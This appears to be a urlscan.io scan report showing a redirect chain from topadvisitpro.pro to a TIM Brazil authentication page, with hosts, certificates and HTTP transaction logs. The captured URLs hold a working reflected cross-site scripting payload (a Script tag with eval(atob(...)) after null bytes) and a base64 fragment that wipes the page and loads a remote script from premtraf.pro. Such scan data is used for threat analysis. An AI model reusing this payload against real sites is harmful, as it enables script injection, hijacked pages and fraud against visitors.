urlscan.io logo urlscan.io
SecurityTrails logo

auth3.tim.com.br Open in urlscan Pro
45.60.63.22  Public Scan

Go To Rescan Add Verdict Report
Submitted URL: http://topadvisitpro.pro/lion/362hgfchfg.php
Effective URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F...
Submission: On January 29 via api from US — Scanned from US
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 10 IPs in 3 countries across 10 domains to perform 28 HTTP transactions. The main IP is 45.60.63.22, located in United States and belongs to INCAPSULA, US. The main domain is auth3.tim.com.br.
This is the only time auth3.tim.com.br was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
1 2 45.90.56.13 204957 (GREENFLOI...)
2 13 45.60.63.22 19551 (INCAPSULA)
4 2607:f8b0:400... 15169 (GOOGLE)
2 91.241.94.8 49582 (UPSTREAM-...)
1 91.220.208.18 ()
2 2607:f8b0:400... 15169 (GOOGLE)
2 2001:4860:480... 15169 (GOOGLE)
2 2607:f8b0:400... 15169 (GOOGLE)
1 2607:f8b0:400... ()
28 10
2    45.90.56.13 (Geneva, Switzerland)

ASN204957 (GREENFLOID-AS, US)
PTR: mon-fri.gg
topadvisitpro.pro
premtraf.pro
13    45.60.63.22 (United States)

ASN19551 (INCAPSULA, US)
auth3.tim.com.br
4    2607:f8b0:4004:c1b::61 (Washington, United States)

ASN15169 (GOOGLE, US)
www.googletagmanager.com
2    91.241.94.8 (Greece)

ASN49582 (UPSTREAM-AS Greece, GR)
www.timpromos.com.br
1    91.220.208.18 (None, )

ASN- ()
analytics-br-tim.securewebfraud.io
2    2607:f8b0:4004:c1b::71 (Washington, United States)

ASN15169 (GOOGLE, US)
www.google-analytics.com
2    2001:4860:4802:38::181 (United States)

ASN15169 (GOOGLE, US)
analytics.google.com
2    2607:f8b0:4004:c08::9d (Ashburn, United States)

ASN15169 (GOOGLE, US)
stats.g.doubleclick.net
1    2607:f8b0:4004:c09::6a (None, )

ASN- ()
www.google.com
Apex Domain
Subdomains		 Transfer
13 tim.com.br
auth3.tim.com.br
78 KB
4 googletagmanager.com
www.googletagmanager.com — Cisco Umbrella Rank: 37
250 KB
3 google.com
analytics.google.com — Cisco Umbrella Rank: 154
www.google.com
716 B
2 doubleclick.net
stats.g.doubleclick.net — Cisco Umbrella Rank: 79
394 B
2 google-analytics.com
www.google-analytics.com — Cisco Umbrella Rank: 27
21 KB
2 timpromos.com.br
www.timpromos.com.br
47 KB
1 securewebfraud.io
analytics-br-tim.securewebfraud.io
332 B
1 premtraf.pro
premtraf.pro
4 KB
1 topadvisitpro.pro
topadvisitpro.pro
2 KB
0 dindo.com.br Failed
wap.dindo.com.br Failed
28 10
Domain Requested by
13 auth3.tim.com.br 2 redirects auth3.tim.com.br
4 www.googletagmanager.com auth3.tim.com.br
www.googletagmanager.com
2 stats.g.doubleclick.net www.googletagmanager.com
www.google-analytics.com
2 analytics.google.com www.googletagmanager.com
2 www.google-analytics.com www.googletagmanager.com
www.google-analytics.com
2 www.timpromos.com.br auth3.tim.com.br
1 www.google.com
1 analytics-br-tim.securewebfraud.io
1 premtraf.pro auth3.tim.com.br
1 topadvisitpro.pro 1 redirects
0 wap.dindo.com.br Failed auth3.tim.com.br
28 11

This site contains no links.

Subject Issuer Validity Valid
auth3.tim.com.br
DigiCert Global G2 TLS RSA SHA256 2020 CA1		 2023-04-19 -
2024-04-18		 a year crt.sh
*.google-analytics.com
GTS CA 1C3		 2024-01-02 -
2024-03-26		 3 months crt.sh
*.google.com
GTS CA 1C3		 2024-01-02 -
2024-03-26		 3 months crt.sh
*.g.doubleclick.net
GTS CA 1C3		 2024-01-02 -
2024-03-26		 3 months crt.sh
www.google.com
GTS CA 1C3		 2024-01-02 -
2024-03-26		 3 months crt.sh

This page contains 3 frames:

Primary Page: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Frame ID: 88C2CE31E0412CA880E262C4334C49E1
Requests: 23 HTTP requests in this frame

Frame: https://wap.dindo.com.br/newMobile/auth/tim/header.aspx?s=25
Frame ID: 79C817FEEDD9B02A37F32BB3E222E30E
Requests: 1 HTTP requests in this frame

Frame: https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
Frame ID: 4E2B29914EEA96476CF71E587041E195
Requests: 4 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page URL History Show full URLs

  1. http://topadvisitpro.pro/lion/362hgfchfg.php HTTP 301
    http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982F... Page URL

Detected technologies

Overall confidence: 100%
Detected patterns
  • google-analytics\.com/(?:ga|urchin|analytics)\.js
Overall confidence: 100%
Detected patterns
  • googletagmanager\.com/gtm\.js
  • googletagmanager\.com/gtag/js
Overall confidence: 100%
Detected patterns
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

28
Requests

68 %
HTTPS

56 %
IPv6

10
Domains

11
Subdomains

10
IPs

3
Countries

399 kB
Transfer

1149 kB
Size

10
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. http://topadvisitpro.pro/lion/362hgfchfg.php HTTP 301
    http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2 Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 13
  • http://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45 HTTP 302
  • https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
Request Chain 15
  • http://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png HTTP 302
  • https://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png

28 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request heloading
auth3.tim.com.br/v3/accesscontrol-web/
Redirect Chain
  • http://topadvisitpro.pro/lion/362hgfchfg.php
  • http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&en...
14 KB
4 KB 		Document
General
Check archive.org
Download Go to
Full URL
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
HTTP/1.1
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
dac0e0a27027392c4c5754b40e9df0b62627319dbab1bb3ee2aa1e72ddcf5c62

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36
accept-language
en-US,en;q=0.9

Response headers

Connection
Keep-Alive
Content-Encoding
gzip
Content-Language
en-US
Content-Type
text/html; charset=ISO-8859-1
Date
Mon, 29 Jan 2024 01:49:31 GMT
Keep-Alive
timeout=4, max=1500
Server
Apache
Transfer-Encoding
chunked
X-CDN
Imperva
X-Iinfo
14-9859630-9859632 NNYN CT(115 -1 0) RT(1706492970368 13) q(0 1 2 1) r(8 8) U24

Redirect headers

Connection
Keep-Alive
Content-Length
0
Content-Type
text/html; charset=UTF-8
Date
Mon, 29 Jan 2024 01:49:30 GMT
Keep-Alive
timeout=5, max=100
Location
http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vcHJlbXRyYWYucHJvL2xpb24vMjIyZ2Roai90ZW1wLmpzJztpZENsaWNrPScnO2xpbms9J2FIUjBjRG92TDNkM2R5NTBhVzF3Y205dGIzTXVZMjl0TG1KeUwwOVVRUzFDVWxSSlRTMUNSVTFQUWt0SlJGTXZkR2x0WjJGdFpYTnJhV1J6TWkxd2RDMWtiMmt0ZDJWaVAwaEZTMlY1ZDI5eVpEMVBWRUZmVkVkQlRVVlRTMGxFVTE5SVFVWmZNaVoxZEcxZmMyOTFjbU5sUFdoaFppWjFkRzFmYldWa2FYVnRQV053WVNaMWRHMWZZMjl1ZEdWdWREMTBhVzFuWVcxbGMydHBaSE15Sm5WMGJWOWpZVzF3WVdsbmJqMVBWRUZmVkVkQlRVVlRTMGxFVTE5SVFVWmZNaTFvWVdZdGQyVmlMV053WVMxMGFXMW5ZVzFsYzJ0cFpITXlMV2x0WVdkbEptaGhabDlwWkQwMk5XSTNNRFF5WVdJMU9HRXlNVEF6TkRnMk5qQmtOMlFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs=
Server
Apache/2.4.38 (Debian)
TIM-Login-styles-sheet.css
auth3.tim.com.br/OTP/css/ 		21 KB
4 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/css/TIM-Login-styles-sheet.css
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
38b82be8dc970bd32e5651b51b46d5c5bdd81a1766c035bbe022f1d00ac09fce

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Thu, 04 May 2017 03:57:51 GMT
server
Apache
x-cdn
Imperva
etag
"1742c1-539a-54eaac6d7edc0"
content-type
text/css
x-iinfo
13-8388815-8388825 NNYN CT(115 611 0) RT(1706492971219 41) q(0 0 7 0) r(9 9) U24
x-incap-sess-cookie-hdr
YnHHJtMbdFz+bcSXF9xUAiwEt2UAAAAA/ScmMtkDJiQ8fJP2iUUkBw==
accept-ranges
bytes
cns.css
wap.dindo.com.br/newMobile/auth/tim/ 		0
0
jquery.min.js
auth3.tim.com.br/OTP/js/ 		95 KB
34 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/jquery.min.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
668b046d12db350ccba6728890476b3efee53b2f42dbb84743e5e9f1ae0cc404

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Tue, 13 Sep 2016 17:46:50 GMT
server
Apache
x-cdn
Imperva
etag
"42851-17b8b-53c67327e7680"
content-type
application/javascript
x-iinfo
13-8388815-8388833 NNYN CT(115 604 0) RT(1706492971219 52) q(0 0 7 -1) r(9 9) U24
x-incap-sess-cookie-hdr
cLCQbp5uaFP+bcSXF9xUAiwEt2UAAAAAuVyiTxhvLxZ4kO2INU89ig==
accept-ranges
bytes
jquery.mask.min.js
auth3.tim.com.br/OTP/js/ 		6 KB
3 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/jquery.mask.min.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
e0ef803f8bb9cbe07f2407212c2422f87d48dbd08addb5bb994c5f485b2dcc6a

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Mon, 12 Sep 2016 11:15:48 GMT
server
Apache
x-cdn
Imperva
etag
"1742cd-1788-53c4d9e356100"
content-type
application/javascript
x-iinfo
13-8388815-8388831 PNYN RT(1706492971219 56) q(0 9 9 -1) r(10 10) U24
x-incap-sess-cookie-hdr
SLH4VPLxoTD+bcSXF9xUAiwEt2UAAAAAOJWNvsW4gb3TWZt2HqJiQA==
accept-ranges
bytes
jquery.bxslider.min.js
auth3.tim.com.br/OTP/js/ 		20 KB
6 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/jquery.bxslider.min.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
646de1820a3f0a81b2aa7ea26de561e5cbab36ef8430d7bb7b7f0ab024569b40

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Mon, 12 Sep 2016 11:15:48 GMT
server
Apache
x-cdn
Imperva
etag
"4284f-4e4c-53c4d9e356100"
content-type
application/javascript
x-iinfo
13-8388815-8388835 NNYN CT(118 603 0) RT(1706492971219 54) q(0 0 7 -1) r(9 9) U24
x-incap-sess-cookie-hdr
wDsZFEaAfzX+bcSXF9xUAiwEt2UAAAAA+/3WsLFGLCYMMnpgWPA0dw==
accept-ranges
bytes
bowser.js
auth3.tim.com.br/OTP/js/ 		9 KB
3 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/bowser.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
71928367deed25916c0de98665f5733b47e07ae048a79a0901a48fabb9876040

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Thu, 12 Jan 2017 19:10:36 GMT
server
Apache
x-cdn
Imperva
etag
"41283-2219-545ea78dd8300"
content-type
application/javascript
x-iinfo
13-8388815-8388830 NNYN CT(115 610 0) RT(1706492971219 45) q(0 0 7 3) r(9 9) U24
x-incap-sess-cookie-hdr
TYQ5F1Og2SD+bcSXF9xUAiwEt2UAAAAA2qYHvksgEaixi7aN8D52Ew==
accept-ranges
bytes
spinner.js
auth3.tim.com.br/OTP/js/ 		611 B
970 B 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/spinner.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
d8151845717c3ed76a8002136f43423e7efedc096b4f60eb7aefe62c65544eef

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Wed, 05 Sep 2018 17:22:45 GMT
server
Apache
x-cdn
Imperva
etag
"1742c9-263-5752305ca4340"
content-type
application/javascript
x-iinfo
13-8388815-8388831 NNYN CT(114 607 0) RT(1706492971219 45) q(0 0 7 5) r(9 9) U24
x-incap-sess-cookie-hdr
3NLZUWFGVmr+bcSXF9xUAiwEt2UAAAAAk735BylAR9Lsay+EiRLIvQ==
accept-ranges
bytes
logClientV3.js
auth3.tim.com.br/OTP/js/ 		304 B
733 B 		Script
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/OTP/js/logClientV3.js
Requested by
Host: auth3.tim.com.br
